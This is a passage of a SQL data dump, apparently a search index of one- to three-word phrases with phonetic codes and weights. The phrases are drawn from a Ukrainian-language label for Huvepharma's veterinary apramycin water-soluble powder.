тижнів',0,1,1.2667,'т000',1,'*'),(1555947,'3 тижнів курчата','3 тижнів курчата',0,1,1.5333,'т000',1,'*'),(1555948,'3-5','3-5',0,0,0.3,'',1,'*'),(1555949,'3-5 д1б','3-5 д1б',0,1,1.2333,'д000',1,'*'),(1555950,'3-5 д1б кролі','3-5 д1б кролі',0,1,1.4333,'д000',1,'*'),(1555951,'40-80','40-80',0,0,0.5,'',1,'*'),(1555952,'40-80 мг','40-80 мг',0,1,1.2667,'м000',1,'*'),(1555953,'40-80 мг препарату','40-80 мг препарату',0,1,1.6,'м000',1,'*'),(1555954,'5 д1б','5 д1б',0,1,1.1667,'д000',1,'*'),(1555955,'5 д1б поросята','5 д1б поросята',0,1,1.4667,'д000',1,'*'),(1555956,'5 с','5 с',0,1,1.1,'с000',1,'*'),(1555957,'5 с до','5 с до',0,1,1.2,'с000',1,'*'),(1555958,'5-10 мг','5-10 мг',0,1,1.2333,'м000',1,'*'),(1555959,'5-10 мг діючої','5-10 мг діючої',0,1,1.4667,'м000',1,'*'),(1555960,'5-8','5-8',0,0,0.3,'',1,'*'),(1555961,'5-8 діб','5-8 діб',0,1,1.2333,'д000',1,'*'),(1555962,'5-8 діб або100-200','5-8 діб або100-200',0,1,1.6,'д000',1,'*'),(1555963,'50 г','50 г',0,1,1.1333,'г000',1,'*'),(1555964,'50 г або','50 г або',0,1,1.2667,'г000',1,'*'),(1555965,'50-100','50-100',0,0,0.6,'',1,'*'),(1555966,'50-100 мг','50-100 мг',0,1,1.3,'м000',1,'*'),(1555967,'50-100 мг апрам1цину','50-100 мг апрам1цину',0,1,1.6667,'м000',1,'*'),(1555968,'50-100 мг апраміцину','50-100 мг апраміцину',0,1,1.6667,'м000',1,'*'),(1555969,'500 мг допоміжнi','500 мг допоміжнi',0,1,1.5333,'м000',1,'*'),(1555970,'500-1000','500-1000',0,0,0.8,'',1,'*'),(1555971,'500-1000 мг','500-1000 мг',0,1,1.3667,'м000',1,'*'),(1555972,'500-1000 мг препарату','500-1000 мг препарату',0,1,1.7,'м000',1,'*'),(1555973,'7 д1б','7 д1б',0,1,1.1667,'д000',1,'*'),(1555974,'7 д1б ягнята','7 д1б ягнята',0,1,1.4,'д000',1,'*'),(1555975,'7 діб','7 діб',0,1,1.1667,'д000',1,'*'),(1555976,'7 діб протипоказання','7 діб протипоказання',0,1,1.6667,'д000',1,'*'),(1555977,'7,5-12,5','7,5-12,5',0,0,0.8,'',1,'*'),(1555978,'7,5-12,5 мг','7,5-12,5 мг',0,1,1.3667,'м000',1,'*'),(1555979,'7,5-12,5 мг д1ючоi\'','7,5-12,5 мг д1ючоi',0,1,1.6333,'м000',1,'*'),(1555980,'8 с','8 с',0,1,1.1,'с000',1,'*'),(1555981,'8 с для','8 с для',0,1,1.2333,'с000',1,'*'),(1555982,'aeruginosa','aeruginosa',0,0,0.6667,'A6252',1,'*'),(1555983,'aeruginosa shidella','aeruginosa shidella',0,1,1.6333,'A625234',1,'*'),(1555984,'aeruginosa shidella sonnei','aeruginosa shidella sonnei',0,1,1.8667,'A62523425',1,'*'),(1555985,'apramitsin','apramitsin',0,0,0.6667,'A165325',1,'*'),(1555986,'apramitsin 100','apramitsin 100',0,1,1.4667,'A165325',1,'*'),(1555987,'apramitsin 100 g','apramitsin 100 g',0,1,1.5333,'A1653252',1,'*'),(1555988,'aureus','aureus',0,0,0.4,'A620',1,'*'),(1555989,'aureus streptococcus','aureus streptococcus',0,1,1.6667,'A6236132',1,'*'),(1555990,'aureus streptococcus haemolyticus','aureus streptococcus haemolyticus',0,1,2,'A62361325432',1,'*'),(1555991,'bolgariya','bolgariya',0,0,0.6,'B426',1,'*'),(1555992,'bordetella','bordetella',0,0,0.6667,'B634',1,'*'),(1555993,'bordetella bronchiseptica','bordetella bronchiseptica',0,1,1.8333,'B6341652132',1,'*'),(1555994,'bordetella bronchiseptica .coli','bordetella bronchiseptica .coli',0,1,2,'B63416521324',1,'*'),(1555995,'bronchiseptica','bronchiseptica',0,0,0.9333,'B652132',1,'*'),(1555996,'bronchiseptica .coli','bronchiseptica .coli',0,1,1.6667,'B6521324',1,'*'),(1555997,'bronchiseptica .coli vibrio','bronchiseptica .coli vibrio',0,1,1.9,'B652132416',1,'*'),(1555998,'coli klebsiella','coli klebsiella',0,1,1.5,'C424124',1,'*'),(1555999,'coli klebsiella spp','coli klebsiella spp',0,1,1.6333,'C42412421',1,'*'),(1556000,'g','g',0,0,0.0667,'G000',1,'*'),(1556001,'g huvepharma','g huvepharma',0,1,1.4,'G165',1,'*'),(1556002,'g huvepharma bolgariya','g huvepharma bolgariya',0,1,1.7333,'G1651426',1,'*'),(1556003,'haemolyticus','haemolyticus',0,0,0.8,'H5432',1,'*'),(1556004,'haemolyticus та','haemolyticus та',0,1,1.5,'H5432',1,'*'),(1556005,'haemolyticus та мікоплазми','haemolyticus та мікоплазми',0,1,1.8667,'H5432',1,'*'),(1556006,'huvepharma','huvepharma',0,0,0.6667,'H165',1,'*'),(1556007,'huvepharma bolgariya','huvepharma bolgariya',0,1,1.6667,'H1651426',1,'*'),(1556008,'huvepharma болгарія','huvepharma болгарія',0,1,1.6333,'H165',1,'*'),(1556009,'hyopneumoniae','hyopneumoniae',0,0,0.8667,'H150',1,'*'),(1556010,'hyopneumoniae при','hyopneumoniae при',0,1,1.5667,'H150',1,'*'),(1556011,'hyopneumoniae при пероральному','hyopneumoniae при пероральному',0,1,2,'H150',1,'*'),(1556012,'klebsiella spp pseudomonas','klebsiella spp pseudomonas',0,1,1.8667,'K4124212352',1,'*'),(1556013,'proteus','proteus',0,0,0.4667,'P632',1,'*'),(1556014,'proteus spp','proteus spp',0,1,1.3667,'P6321',1,'*'),(1556015,'proteus spp деякі','proteus spp деякі',0,1,1.5667,'P6321',1,'*'),(1556016,'pseudomonas','pseudomonas',0,0,0.7333,'P2352',1,'*'),(1556017,'pseudomonas aeruginosa','pseudomonas aeruginosa',0,1,1.7333,'P23526252',1,'*'),(1556018,'pseudomonas aeruginosa shidella','pseudomonas aeruginosa shidella',0,1,2,'P2352625234',1,'*'),(1556019,'qj01','qj01',0,0,0.2667,'Q000',1,'*'),(1556020,'qj01 антибактеріальні','qj01 антибактеріальні',0,1,1.7,'Q000',1,'*'),(1556021,'qj01 антибактеріальні ветеринарні','qj01 антибактеріальні ветеринарні',0,1,2,'Q000',1,'*'),(1556022,'qj01gb90','qj01gb90',0,0,0.5333,'Q100',1,'*'),(1556023,'qj01gb90 апраміцин','qj01gb90 апраміцин',0,1,1.6,'Q100',1,'*'),(1556024,'qj01gb90 апраміцин апраміцин','qj01gb90 апраміцин апраміцин',0,1,1.9333,'Q100',1,'*'),(1556025,'salmonella spp proteus','salmonella spp proteus',0,1,1.7333,'S45421632',1,'*'),(1556026,'shidella','shidella',0,0,0.5333,'S340',1,'*'),(1556027,'shidella sonnei','shidella sonnei',0,1,1.5,'S3425',1,'*'),(1556028,'shidella sonnei salmonella','shidella sonnei salmonella',0,1,1.8667,'S34252454',1,'*'),(1556029,'sonnei','sonnei',0,0,0.4,'S500',1,'*'),(1556030,'sonnei salmonella','sonnei salmonella',0,1,1.5667,'S52454',1,'*'),(1556031,'sonnei salmonella spp','sonnei salmonella spp',0,1,1.7,'S5245421',1,'*'),(1556032,'spp proteus','spp proteus',0,1,1.3667,'S1632',1,'*'),(1556033,'spp proteus spp','spp proteus spp',0,1,1.5,'S16321',1,'*'),(1556034,'spp pseudomonas','spp pseudomonas',0,1,1.5,'S12352',1,'*'),(1556035,'spp pseudomonas aeruginosa','spp pseudomonas aeruginosa',0,1,1.8667,'S123526252',1,'*'),(1556036,'spp деякі','spp деякі',0,1,1.3,'S100',1,'*'),(1556037,'spp деякі грампозитивні','spp деякі грампозитивні',0,1,1.7667,'S100',1,'*'),(1556038,'staphylococcus aureus','staphylococcus aureus',0,1,1.7,'S314262',1,'*'),(1556039,'staphylococcus aureus streptococcus','staphylococcus aureus streptococcus',0,1,2,'S31426236132',1,'*'),(1556040,'streptococcus haemolyticus','streptococcus haemolyticus',0,1,1.8667,'S361325432',1,'*'),(1556041,'streptococcus haemolyticus та','streptococcus haemolyticus та',0,1,1.9667,'S361325432',1,'*'),(1556042,'vibrio','vibrio',0,0,0.4,'V600',1,'*'),(1556043,'vibrio coli','vibrio coli',0,1,1.3667,'V624',1,'*'),(1556044,'vibrio coli klebsiella','vibrio coli klebsiella',0,1,1.7333,'V62424124',1,'*'),(1556045,'vеt','vеt',0,0,0.2,'V300',1,'*'),(1556046,'vеt класифікаційний','vеt класифікаційний',0,1,1.6333,'V300',1,'*'),(1556047,'vеt класифікаційний код','vеt класифікаційний код',0,1,1.7667,'V300',1,'*'),(1556048,'«кришка','«кришка',0,0,0.4667,'к000',1,'*'),(1556049,'«кришка у','«кришка у',0,1,1.3,'к000',1,'*'),(1556050,'«кришка у кришці»','«кришка у кришці»',0,1,1.5667,'к000',1,'*'),(1556051,'і характеризуєтьсянизькою','і характеризуєтьсянизькою',0,1,1.8333,'і000',1,'*'),(1556052,'і характеризуєтьсянизькою токсичністю','і характеризуєтьсянизькою токсичністю',0,1,2,'і000',1,'*'),(1556053,'і частково','і частково',0,1,1.3333,'і000',1,'*'),(1556054,'і частково з','і частково з',0,1,1.4,'і000',1,'*'),(1556055,'іншими','іншими',0,0,0.4,'і000',2,'*'),(1556056,'іншими лікарськими','іншими лікарськими',0,1,1.6,'і000',1,'*'),(1556057,'іншими лікарськими засобами','іншими лікарськими засобами',0,1,1.9,'і000',1,'*'),(1556058,'іржі','іржі',0,0,0.2667,'і000',1,'*'),(1556059,'іржі форма','іржі форма',0,1,1.3333,'і000',1,'*'),(1556060,'іржі форма випуску','іржі форма випуску',0,1,1.6,'і000',1,'*'),(1556061,'або 100','або 100',0,1,1.2333,'а000',1,'*'),(1556062,'або 100 г','або 100 г',0,1,1.3,'а000',1,'*'),(1556063,'або зам1нниками','або зам1нниками',0,1,1.5,'а000',1,'*'),(1556064,'або зам1нниками молока','або зам1нниками молока',0,1,1.7333,'а000',1,'*'),(1556065,'або згодовують','або згодовують',0,1,1.4667,'а000',1,'*'),(1556066,'або згодовують непродуктивним','або згодовують непродуктивним',0,1,1.9667,'а000',1,'*'),(1556067,'або кремового','або кремового',0,1,1.4333,'а000',1,'*'),(1556068,'або кремового кольору','або кремового кольору',0,1,1.7,'а000',1,'*'),(1556069,'або100-200','або100-200',0,0,0.6667,'а000',1,'*'),(1556070,'або100-200 мг','або100-200 мг',0,1,1.4333,'а000',1,'*'),(1556071,'або100-200 мг препарату','або100-200 мг препарату',0,1,1.7667,'а000',1,'*'),(1556072,'активно','активно',0,0,0.4667,'а000',2,'*'),(1556073,'активно діє','активно діє',0,1,1.3667,'а000',1,'*'),(1556074,'активно діє на','активно діє на',0,1,1.4667,'а000',1,'*'),(1556075,'аміноглікозидний','аміноглікозидний',0,0,1,'а000',1,'*'),(1556076,'аміноглікозидний антибіотик','аміноглікозидний антибіотик',0,1,1.9,'а000',1,'*'),(1556077,'аміноглікозидний антибіотик що','аміноглікозидний антибіотик що',0,1,2,'а000',1,'*'),(1556078,'аминогликозидов','аминогликозидов',0,0,1,'а000',1,'*'),(1556079,'аминогликозидов широчайший','аминогликозидов широчайший',0,1,1.8667,'а000',1,'*'),(1556080,'аминогликозидов широчайший спектр','аминогликозидов широчайший спектр',0,1,2,'а000',1,'*'),(1556081,'антибіотик що','антибіотик що',0,1,1.4333,'а000',1,'*'),(1556082,'антибіотик що характеризується','антибіотик що характеризується',0,1,2,'а000',1,'*'),(1556083,'антибіотиками','антибіотиками',0,0,0.8667,'а000',1,'*'),(1556084,'антибіотиками у','антибіотиками у',0,1,1.5,'а000',1,'*'),(1556085,'антибіотиками у зв\'язку','антибіотиками у зв',0,1,1.7667,'а000',1,'*'),(1556086,'антибактер1альн1','антибактер1альн1',0,0,1,'а000',1,'*'),(1556087,'антибактер1альн1 концентрац11','антибактер1альн1 концентрац11',0,1,1.9667,'а000',1,'*'),(1556088,'антибактер1альн1 концентрац11 у','антибактер1альн1 концентрац11 у',0,1,2,'а000',1,'*'),(1556089,'антибактеріальні','антибактеріальні',0,0,1,'а000',1,'*'),(1556090,'антибактеріальні ветеринарні','антибактеріальні ветеринарні',0,1,1.9333,'а000',1,'*'),(1556091,'антибактеріальні ветеринарні препарати','антибактеріальні ветеринарні препарати',0,1,2,'а000',1,'*'),(1556092,'антибактеріального','антибактеріального',0,0,1,'а000',1,'*'),(1556093,'антибактеріального ефекту','антибактеріального ефекту',0,1,1.8333,'а000',1,'*'),(1556094,'антибактеріального ефекту не','антибактеріального ефекту не',0,1,1.9333,'а000',1,'*'),(1556095,'антибиотиков','антибиотиков',0,0,0.8,'а000',1,'*'),(1556096,'антибиотиков группы','антибиотиков группы',0,1,1.6333,'а000',1,'*'),(1556097,'антибиотиков группы аминогликозидов','антибиотиков группы аминогликозидов',0,1,2,'а000',1,'*'),(1556098,'апрам1цину','апрам1цину',0,0,0.6667,'а000',1,'*'),(1556099,'апрам1цину дозування','апрам1цину дозування',0,1,1.6667,'а000',1,'*'),(1556100,'апрам1цину дозування перорально','апрам1цину дозування перорально',0,1,2,'а000',1,'*'),(1556101,'апрам1цину кролi','апрам1цину кролi',0,1,1.5333,'а000',1,'*'),(1556102,'апрам1цину кролi лiкування','апрам1цину кролi лiкування',0,1,1.8667,'а000',1,'*'),(1556103,'апрам1цину курчата','апрам1цину курчата',0,1,1.6,'а000',1,'*'),(1556104,'апрам1цину курчата кури-бройлери','апрам1цину курчата кури-бройлери',0,1,2,'а000',1,'*'),(1556105,'апрам1цину на','апрам1цину на',0,1,1.4333,'а000',1,'*'),(1556106,'апрам1цину на 1','апрам1цину на 1',0,1,1.5,'а000',1,'*'),(1556107,'апрам1цину поросята','апрам1цину поросята',0,1,1.6333,'а000',1,'*'),(1556108,'апрам1цину поросята вiком','апрам1цину поросята вiком',0,1,1.8333,'а000',1,'*'),(1556109,'апрам1цину ягнята','апрам1цину ягнята',0,1,1.5667,'а000',1,'*'),(1556110,'апрам1цину ягнята вiком','апрам1цину ягнята вiком',0,1,1.7667,'а000',1,'*'),(1556111,'апраміцин','апраміцин',0,0,0.6,'а000',1,'*'),(1556112,'апраміцин 100','апраміцин 100',0,1,1.4333,'а000',1,'*'),(1556113,'апраміцин 100 г','апраміцин 100 г',0,1,1.5,'а000',1,'*'),(1556114,'апраміцин апраміцин','апраміцин апраміцин',0,1,1.6333,'а000',1,'*'),(1556115,'апраміцин апраміцин це','апраміцин апраміцин це',0,1,1.7333,'а000',1,'*'),(1556116,'апраміцин водорозчинний','апраміцин водорозчинний',0,1,1.7667,'а000',1,'*'),(1556117,'апраміцин водорозчинний порошок','апраміцин водорозчинний порошок',0,1,2,'а000',1,'*'),(1556118,'апраміцин це','апраміцин це',0,1,1.4,'а000',1,'*'),(1556119,'апраміцин це аміноглікозидний','апраміцин це аміноглікозидний',0,1,1.9667,'а000',1,'*'),(1556120,'апраміцину','апраміцину',0,0,0.6667,'а000',1,'*'),(1556121,'апраміцину на','апраміцину на',0,1,1.4333,'а000',1,'*'),(1556122,'апраміцину на 1','апраміцину на 1',0,1,1.5,'а000',1,'*'),(1556123,'апраміцину не','апраміцину не',0,1,1.4333,'а000',1,'*'),(1556124,'апраміцину не застосовувати','апраміцину не застосовувати',0,1,1.9,'а000',1,'*'),(1556125,'апраміцину сульфат','апраміцину сульфат',0,1,1.6,'а000',1,'*'),(1556126,'апраміцину сульфат в','апраміцину сульфат в',0,1,1.6667,'а000',1,'*'),(1556127,'атс','атс',0,0,0.2,'а000',1,'*'),(1556128,'атс vеt','атс vеt',0,1,1.2333,'а130',1,'*'),(1556129,'атс vеt класифікаційний','атс vеt класифікаційний',0,1,1.7667,'а130',1,'*'),(1556130,'білкового','білкового',0,0,0.6,'б000',1,'*'),(1556131,'білкового синтезу','білкового синтезу',0,1,1.5667,'б000',1,'*'),(1556132,'білкового синтезу бактеріальної','білкового синтезу бактеріальної',0,1,2,'б000',1,'*'),(1556133,'білого','білого',0,0,0.4,'б000',1,'*'),(1556134,'білого або','білого або',0,1,1.3333,'б000',1,'*'),(1556135,'білого або кремового','білого або кремового',0,1,1.6667,'б000',1,'*'),(1556136,'бактеріальної','бактеріальної',0,0,0.8667,'б000',1,'*'),(1556137,'бактеріальної клітини','бактеріальної клітини',0,1,1.7,'б000',1,'*'),(1556138,'бактеріальної клітини активно','бактеріальної клітини активно',0,1,1.9667,'б000',1,'*'),(1556139,'бактерицидною','бактерицидною',0,0,0.8667,'б000',1,'*'),(1556140,'бактерицидною дією','бактерицидною дією',0,1,1.6,'б000',1,'*'),(1556141,'бактерицидною дією яка','бактерицидною дією яка',0,1,1.7333,'б000',1,'*'),(1556142,'банки','банки',0,0,0.3333,'б000',1,'*'),(1556143,'банки по','банки по',0,1,1.2667,'б000',1,'*'),(1556144,'банки по 50','банки по 50',0,1,1.3667,'б000',1,'*'),(1556145,'безводний','безводний',0,0,0.6,'б000',1,'*'),(1556146,'безводний лактози','безводний лактози',0,1,1.5667,'б000',1,'*'),(1556147,'безводний лактози моногідрат','безводний лактози моногідрат',0,1,1.9333,'б000',1,'*'),(1556148,'безобмежень','безобмежень',0,0,0.7333,'б000',1,'*'),(1556149,'безобмежень отримане','безобмежень отримане',0,1,1.6667,'б000',1,'*'),(1556150,'безобмежень отримане до','безобмежень отримане до',0,1,1.7667,'б000',1,'*'),(1556151,'бета-лактамними','бета-лактамними',0,0,1,'б000',1,'*'),(1556152,'бета-лактамними антибіотиками','бета-лактамними антибіотиками',0,1,1.9667,'б000',1,'*'),(1556153,'бета-лактамними антибіотиками у','бета-лактамними антибіотиками у',0,1,2,'б000',1,'*'),(1556154,'болгарія','болгарія',0,0,0.5333,'б000',1,'*'),(1556155,'в перерахунку','в перерахунку',0,1,1.4333,'в000',1,'*'),(1556156,'в перерахунку на','в перерахунку на',0,1,1.5333,'в000',1,'*'),(1556157,'вiком','вiком',0,0,0.3333,'в000',1,'*'),(1556158,'вiком до','вiком до',0,1,1.2667,'в000',1,'*'),(1556159,'вiком до 120','вiком до 120',0,1,1.4,'в000',1,'*'),(1556160,'вiком до 3','вiком до 3',0,1,1.3333,'в000',1,'*'),(1556161,'від 2','від 2',0,1,1.1667,'в000',1,'*'),(1556162,'від 2 с','від 2 с',0,1,1.2333,'в000',1,'*'),(1556163,'від 5 с','від 5 с',0,1,1.2333,'в000',1,'*'),(1556164,'від іржі','від іржі',0,1,1.2667,'в000',1,'*'),(1556165,'від іржі форма','від іржі форма',0,1,1.4667,'в000',1,'*'),(1556166,'від висновку','від висновку',0,1,1.4,'в000',1,'*'),(1556167,'від висновку лікаря','від висновку лікаря',0,1,1.6333,'в000',1,'*'),(1556168,'вагітності','вагітності',0,0,0.6667,'в000',1,'*'),(1556169,'вагітності та','вагітності та',0,1,1.4333,'в000',1,'*'),(1556170,'вагітності та лактації','вагітності та лактації',0,1,1.7333,'в000',1,'*'),(1556171,'введенн1','введенн1',0,0,0.5333,'в000',1,'*'),(1556172,'введенн1 повiльно','введенн1 повiльно',0,1,1.5667,'в000',1,'*'),(1556173,'введенн1 повiльно всмокту','введенн1 повiльно всмокту',0,1,1.8333,'в000',1,'*'),(1556174,'ветеринарні','ветеринарні',0,0,0.7333,'в000',1,'*'),(1556175,'ветеринарні препарати','ветеринарні препарати',0,1,1.7,'в000',1,'*'),(1556176,'ветеринарні препарати для','ветеринарні препарати для',0,1,1.8333,'в000',1,'*'),(1556177,'ветеринарної медицини перед','ветеринарної медицини перед',0,1,1.9,'в000',1,'*'),(1556178,'виводиться','виводиться',0,0,0.6667,'в000',1,'*'),(1556179,'виводиться з','виводиться з',0,1,1.4,'в000',1,'*'),(1556180,'виводиться з організму','виводиться з організму',0,1,1.7333,'в000',1,'*'),(1556181,'виготовлений','виготовлений',0,0,0.8,'в000',1,'*'),(1556182,'виготовлений 13','виготовлений 13',0,1,1.5,'в000',1,'*'),(1556183,'виготовлений 13 поліетилену','виготовлений 13 поліетилену',0,1,1.9,'в000',1,'*'),(1556184,'використати','використати',0,0,0.7333,'в000',1,'*'),(1556185,'використати протягом','використати протягом',0,1,1.6667,'в000',1,'*'),(1556186,'використати протягом 3','використати протягом 3',0,1,1.7333,'в000',1,'*'),(1556187,'випуску пластикові банки','випуску пластикові банки',0,1,1.8,'в000',1,'*'),(1556188,'висновку','висновку',0,0,0.5333,'в000',1,'*'),(1556189,'висновку лікаря','висновку лікаря',0,1,1.5,'в000',1,'*'),(1556190,'висновку лікаря ветеринарної','висновку лікаря ветеринарної',0,1,1.9333,'в000',1,'*'),(1556191,'високi','високi',0,0,0.4,'в000',1,'*'),(1556192,'високi антибактер1альн1','високi антибактер1альн1',0,1,1.7667,'в000',1,'*'),(1556193,'високi антибактер1альн1 концентрац11','високi антибактер1альн1 концентрац11',0,1,2,'в000',1,'*'),(1556194,'вкриті','вкриті',0,0,0.4,'в000',1,'*'),(1556195,'вкриті пластиковими','вкриті пластиковими',0,1,1.6333,'в000',1,'*'),(1556196,'вкриті пластиковими кришками','вкриті пластиковими кришками',0,1,1.9333,'в000',1,'*'),(1556197,'властивості атс','властивості атс',0,1,1.5,'в000',1,'*'),(1556198,'властивості атс vеt','властивості атс vеt',0,1,1.6333,'в130',1,'*'),(1556199,'води що','води що',0,1,1.2333,'в000',1,'*'),(1556200,'води що становить','води що становить',0,1,1.5667,'в000',1,'*'),(1556201,'води щодобово','води щодобово',0,1,1.4333,'в000',1,'*'),(1556202,'води щодобово протягом','води щодобово протягом',0,1,1.7333,'в000',1,'*'),(1556203,'водорозчинний','водорозчинний',0,0,0.8667,'в000',1,'*'),(1556204,'водорозчинний порошок','водорозчинний порошок',0,1,1.7,'в000',1,'*'),(1556205,'водорозчинний порошок водорозчинний','водорозчинний порошок водорозчинний',0,1,2,'в000',1,'*'),(1556206,'водорозчинний порошок для','водорозчинний порошок для',0,1,1.8333,'в000',1,'*'),(1556207,'водою або зам1нниками','водою або зам1нниками',0,1,1.7,'в000',1,'*'),(1556208,'всмокту','всмокту',0,0,0.4667,'в000',1,'*'),(1556209,'всмокту ться','всмокту ться',0,1,1.4,'в000',1,'*'),(1556210,'всмокту ться 1','всмокту ться 1',0,1,1.4667,'в000',1,'*'),(1556211,'встановленим','встановленим',0,0,0.8,'в000',1,'*'),(1556212,'встановленим захисним','встановленим захисним',0,1,1.7,'в000',1,'*'),(1556213,'встановленим захисним кільцем','встановленим захисним кільцем',0,1,1.9667,'в000',1,'*'),(1556214,'высокая','высокая',0,0,0.4667,'в000',1,'*'),(1556215,'высокая эффективность','высокая эффективность',0,1,1.7,'в000',1,'*'),(1556216,'высокая эффективность и','высокая эффективность и',0,1,1.7667,'в000',1,'*'),(1556217,'г huvepharma','г huvepharma',0,1,1.4,'г165',1,'*'),(1556218,'г huvepharma болгарія','г huvepharma болгарія',0,1,1.7,'г165',1,'*'),(1556219,'г або','г або',0,1,1.1667,'г000',1,'*'),(1556220,'г або 100','г або 100',0,1,1.3,'г000',1,'*'),(1556221,'г вкриті','г вкриті',0,1,1.2667,'г000',1,'*'),(1556222,'г вкриті пластиковими','г вкриті пластиковими',0,1,1.7,'г000',1,'*'),(1556223,'г препарату містить','г препарату містить',0,1,1.6333,'г000',1,'*'),(1556224,'гальмуванні','гальмуванні',0,0,0.7333,'г000',1,'*'),(1556225,'гальмуванні білкового','гальмуванні білкового',0,1,1.7,'г000',1,'*'),(1556226,'гальмуванні білкового синтезу','гальмуванні білкового синтезу',0,1,1.9667,'г000',1,'*'),(1556227,'головним','головним',0,0,0.5333,'г000',1,'*'),(1556228,'головним чином','головним чином',0,1,1.4667,'г000',1,'*'),(1556229,'головним чином з','головним чином з',0,1,1.5333,'г000',1,'*'),(1556230,'готовий','готовий',0,0,0.4667,'г000',1,'*'),(1556231,'готовий розчин','готовий розчин',0,1,1.4667,'г000',1,'*'),(1556232,'готовий розчин 3','готовий розчин 3',0,1,1.5333,'г000',1,'*'),(1556233,'грамнегативні','грамнегативні',0,0,0.8667,'г000',1,'*'),(1556234,'грамнегативні bordetella','грамнегативні bordetella',0,1,1.8,'г1634',1,'*'),(1556235,'грамнегативні bordetella bronchiseptica','грамнегативні bordetella bronchiseptica',0,1,2,'г16341652132',1,'*'),(1556236,'грампозитивні','грампозитивні',0,0,0.8667,'г000',1,'*'),(1556237,'грампозитивні мікроорганізми','грампозитивні мікроорганізми',0,1,1.9333,'г000',1,'*'),(1556238,'грампозитивні мікроорганізми staphylococcus','грампозитивні мікроорганізми staphylococcus',0,1,2,'г23142',1,'*'),(1556239,'группы','группы',0,0,0.4,'г000',1,'*'),(1556240,'группы аминогликозидов','группы аминогликозидов',0,1,1.7333,'г000',1,'*'),(1556241,'группы аминогликозидов широчайший','группы аминогликозидов широчайший',0,1,2,'г000',1,'*'),(1556242,'д1б','д1б',0,0,0.2,'д000',1,'*'),(1556243,'д1б кролі','д1б кролі',0,1,1.3,'д000',1,'*'),(1556244,'д1б кролі 100-200','д1б кролі 100-200',0,1,1.5667,'д000',1,'*'),(1556245,'д1б поросята','д1б поросята',0,1,1.4,'д000',1,'*'),(1556246,'д1б поросята вiком','д1б поросята вiком',0,1,1.6,'д000',1,'*'),(1556247,'д1б ягнята','д1б ягнята',0,1,1.3333,'д000',1,'*'),(1556248,'д1б ягнята вiком','д1б ягнята вiком',0,1,1.5333,'д000',1,'*'),(1556249,'д1ючоi\'','д1ючоi',0,0,0.4667,'д000',1,'*'),(1556250,'д1ючоi\' речовини','д1ючоi речовини',0,1,1.5333,'д000',1,'*'),(1556251,'д1ючоi\' речовини на','д1ючоi речовини на',0,1,1.6333,'д000',1,'*'),(1556252,'дiб','дiб',0,0,0.2,'д000',1,'*'),(1556253,'дiб 500-1000','дiб 500-1000',0,1,1.4,'д000',1,'*'),(1556254,'дiб 500-1000 мг','дiб 500-1000 мг',0,1,1.5,'д000',1,'*'),(1556255,'дiб лiкування','дiб лiкування',0,1,1.4333,'д000',1,'*'),(1556256,'дiб лiкування тварин','дiб лiкування тварин',0,1,1.6667,'д000',1,'*'),(1556257,'діє на','діє на',0,1,1.2,'д000',1,'*'),(1556258,'діє на грамнегативні','діє на грамнегативні',0,1,1.6667,'д000',1,'*'),(1556259,'дією','дією',0,0,0.2667,'д000',1,'*'),(1556260,'дією яка','дією яка',0,1,1.2667,'д000',1,'*'),(1556261,'дією яка полягає','дією яка полягає',0,1,1.5333,'д000',1,'*'),(1556262,'діб або100-200','діб або100-200',0,1,1.4667,'д000',1,'*'),(1556263,'діб або100-200 мг','діб або100-200 мг',0,1,1.5667,'д000',1,'*'),(1556264,'діб за','діб за',0,1,1.2,'д000',1,'*'),(1556265,'діб за умови','діб за умови',0,1,1.4,'д000',1,'*'),(1556266,'діб протипоказання','діб протипоказання',0,1,1.6,'д000',1,'*'),(1556267,'діб протипоказання підвищена','діб протипоказання підвищена',0,1,1.9333,'д000',1,'*'),(1556268,'діб телята','діб телята',0,1,1.3333,'д000',1,'*'),(1556269,'діб телята після','діб телята після',0,1,1.5333,'д000',1,'*'),(1556270,'дітей місце при','дітей місце при',0,1,1.5,'д000',1,'*'),(1556271,'діючої','діючої',0,0,0.4,'д000',1,'*'),(1556272,'діючої речовини','діючої речовини',0,1,1.5,'д000',1,'*'),(1556273,'діючої речовини на','діючої речовини на',0,1,1.6,'д000',1,'*'),(1556274,'діючу речовину апраміцину','діючу речовину апраміцину',0,1,1.8333,'д000',1,'*'),(1556275,'действия высокая','действия высокая',0,1,1.5333,'д000',1,'*'),(1556276,'действия высокая эффективность','действия высокая эффективность',0,1,2,'д000',1,'*'),(1556277,'деякі','деякі',0,0,0.3333,'д000',3,'*'),(1556278,'деякі грампозитивні','деякі грампозитивні',0,1,1.6333,'д000',1,'*'),(1556279,'деякі грампозитивні мікроорганізми','деякі грампозитивні мікроорганізми',0,1,2,'д000',1,'*'),(1556280,'для перорального','для перорального',0,1,1.5333,'д000',1,'*'),(1556281,'для перорального застосування','для перорального застосування',0,1,1.9667,'д000',1,'*'),(1556282,'для споживання','для споживання',0,1,1.4667,'д000',1,'*'),(1556283,'для споживання людьми','для споживання людьми',0,1,1.7,'д000',1,'*'),(1556284,'до 120','до 120',0,1,1.2,'д000',1,'*'),(1556285,'до 120 дiб','до 120 дiб',0,1,1.3333,'д000',1,'*'),(1556286,'до 3','до 3',0,1,1.1333,'д000',1,'*'),(1556287,'до 3 м1сяцiв','до 3 м1сяцiв',0,1,1.4,'д000',1,'*'),(1556288,'до 3 мiсяц1в','до 3 мiсяц1в',0,1,1.4,'д000',1,'*'),(1556289,'до 8','до 8',0,1,1.1333,'д000',1,'*'),(1556290,'до 8 с','до 8 с',0,1,1.2,'д000',1,'*'),(1556291,'до апрам1цину','до апрам1цину',0,1,1.4333,'д000',1,'*'),(1556292,'до апрам1цину дозування','до апрам1цину дозування',0,1,1.7667,'д000',1,'*'),(1556293,'до апрам1цину кролi','до апрам1цину кролi',0,1,1.6333,'д000',1,'*'),(1556294,'до апрам1цину курчата','до апрам1цину курчата',0,1,1.7,'д000',1,'*'),(1556295,'до апрам1цину поросята','до апрам1цину поросята',0,1,1.7333,'д000',1,'*'),(1556296,'до апрам1цину ягнята','до апрам1цину ягнята',0,1,1.6667,'д000',1,'*'),(1556297,'до апраміцину','до апраміцину',0,1,1.4333,'д000',1,'*'),(1556298,'до апраміцину не','до апраміцину не',0,1,1.5333,'д000',1,'*'),(1556299,'до зазначеного','до зазначеного',0,1,1.4667,'д000',1,'*'),(1556300,'до зазначеного терміну','до зазначеного терміну',0,1,1.7333,'д000',1,'*'),(1556301,'дозах телята','дозах телята',0,1,1.4,'д000',1,'*'),(1556302,'дозах телята вiком','дозах телята 